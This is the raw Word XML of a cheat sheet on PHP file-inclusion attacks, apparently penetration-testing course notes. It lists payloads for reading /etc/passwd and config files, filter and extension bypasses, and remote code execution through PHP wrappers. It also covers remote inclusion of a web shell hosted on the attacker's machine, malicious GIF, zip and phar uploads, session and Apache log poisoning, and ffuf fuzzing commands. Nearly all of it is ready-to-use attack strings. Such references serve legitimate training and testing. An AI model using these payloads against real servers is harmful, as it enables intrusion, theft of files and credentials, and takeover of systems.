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8.6614173228338" w:right="-891.25984251968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File Inclusion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:bidi w:val="1"/>
        <w:ind w:left="-708.6614173228338" w:right="-891.2598425196836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LFI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-708.6614173228347" w:right="-891.259842519683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/index.php?language=/etc/passwd                                  -      Basic LFI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-708.6614173228347" w:right="-891.259842519683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/index.php?language=../../../../etc/passwd                       -      LFI with path traversal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-708.6614173228347" w:right="-891.259842519683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/index.php?language=/../../../etc/passwd                         -      LFI with name prefix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-708.6614173228347" w:right="-891.259842519683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/index.php?language=./languages/../../../../etc/passwd   -     LFI with approved path</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:ind w:left="-708.6614173228338" w:right="-891.25984251968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08.6614173228338" w:right="-891.2598425196836" w:hanging="141.73228346456781"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LFI Bypasse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-708.6614173228347" w:right="-891.259842519683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index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64    -     Bypass filters with URL encoding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-708.6614173228347" w:right="-891.259842519683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/index.php?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048]      -  Bypass appended extension with path truncation (obsolete)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-708.6614173228347" w:right="-891.2598425196836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/index.php?language=../../../../etc/passwd%00            -   Bypass appended extension with null byte (obsolete)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/index.php?language=php://filter/read=convert.base64-encode/resource=config  -   Read PHP with base64 filter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:ind w:left="720" w:right="-1316.4566929133848" w:hanging="1570.393700787401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right="-1316.4566929133848" w:hanging="1570.3937007874015"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Remote Code Execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F">
      <w:pPr>
        <w:ind w:left="720" w:right="-1316.4566929133848" w:hanging="1570.3937007874015"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PHP Wrappers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/index.php?language=data://text/plain;base64,&lt;in base64 encoded the php command for webshell&gt;&amp;cmd=id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-283.46456692913375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RCE with data wrapper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curl -s -X POST --data '&lt;?php system($_GET["cmd"]); ?&gt;' "http://&lt;SERVER_IP&gt;:&lt;PORT&gt;/index.php?language=php://input&amp;cmd=id" - RCE with input wrapper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curl -s "http://&lt;SERVER_IP&gt;:&lt;PORT&gt;/index.php?language=expect://id"    -   RCE with expect wrapper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">
      <w:pPr>
        <w:ind w:left="720" w:right="-1316.45669291338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08.6614173228347" w:right="-1316.4566929133848" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RFI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echo '&lt;?php system($_GET["cmd"]); ?&gt;' &gt; shell.php &amp;&amp; python3 -m http.server &lt;LISTENING_PORT&gt;                     - Host web shell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/index.php?language=http://&lt;OUR_IP&gt;:&lt;LISTENING_PORT&gt;/shell.php&amp;cmd=id - Include remote PHP web shel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">
      <w:pPr>
        <w:ind w:left="-708.6614173228347" w:right="-1316.456692913384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708.6614173228347" w:right="-1316.4566929133848" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LFI + Upload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echo 'GIF8&lt;?php system($_GET["cmd"]); ?&gt;' &gt; shell.gif                  -          Create malicious image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/index.php?language=./profile_images/shell.gif&amp;cmd=id                  -           RCE with malicious uploaded image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echo '&lt;?php system($_GET["cmd"]); ?&gt;' &gt; shell.php &amp;&amp; zip shell.jpg shell.php  - Create malicious zip archive 'as jpg'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/index.php?language=zip://shell.zip%23shell.php&amp;cmd=id       -          RCE with malicious uploaded zip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php --define phar.readonly=0 shell.php &amp;&amp; mv shell.phar shell.jpg        -     Create malicious phar 'as jpg'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/index.php?language=phar://./profile_images/shell.jpg%2Fshell.txt&amp;cmd=id -  RCE with malicious uploaded phar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">
      <w:pPr>
        <w:ind w:left="-708.6614173228347" w:right="-1316.4566929133848" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Log Poisoning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/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd - Read PHP session parameters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/index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E                - Poison PHP session with web shell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/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&amp;cmd=id   - RCE through poisoned PHP session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curl -s "http://&lt;SERVER_IP&gt;:&lt;PORT&gt;/index.php" -A '&lt;?php system($_GET["cmd"]); ?&gt;'  -  Poison server log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/index.php?language=/var/log/apache2/access.log&amp;cmd=id   -   RCE through poisoned PHP session</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026">
      <w:pPr>
        <w:ind w:left="-566.9291338582677" w:right="-1316.45669291338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08.6614173228347" w:right="-1316.4566929133848" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">     Misc / automating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ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://&lt;SERVER_IP&gt;:&lt;PORT&gt;/index.php?FUZZ=value' -fs 2287     -    Fuzz page parameters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ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://&lt;SERVER_IP&gt;:&lt;PORT&gt;/index.php?language=FUZZ' -fs 2287   -    Fuzz LFI payloads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ffuf -w /opt/useful/SecLists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ -u 'http://&lt;SERVER_IP&gt;:&lt;PORT&gt;/index.php?language=../../../../FUZZ/index.php' -fs 2287   -   Fuzz webroot path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-708.6614173228347" w:right="-1316.4566929133848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ffuf -w ./LFI-WordList-Linux:FUZZ -u 'http://&lt;SERVER_IP&gt;:&lt;PORT&gt;/index.php?language=../../../../FUZZ' -fs 2287  -   Fuzz server configurations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">
      <w:pPr>
        <w:ind w:left="720" w:right="-1316.45669291338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08.6614173228347" w:right="-1316.4566929133848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